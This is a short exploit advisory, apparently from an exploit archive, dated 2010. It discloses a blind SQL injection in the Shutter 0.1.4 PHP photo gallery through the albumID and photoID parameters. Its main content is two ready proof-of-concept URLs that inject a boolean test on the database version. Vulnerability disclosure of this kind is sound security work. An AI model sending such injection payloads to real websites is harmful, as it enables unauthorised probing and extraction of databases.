# Exploit Title: Shutter 0.1.4 Blind SQL Injection
# Date: March 18, 2010
# Author: Blake
# Software Link:
http://sourceforge.net/projects/shutter-php/files/shutter/v0.1.4/shutter_0.1.4.zip/download
# Version: version 0.1.4

The albumID and photoID parameters are vulnerable to SQL Injection.

POC:
http://192.168.1.149/shutter/admin.html?albumID=2%20and%20substring%28@@version,1,1%29=5
http://192.168.1.149/shutter/admin.html?albumID=2&photoID=5%20and%20substring%28@@version,1,1%29=5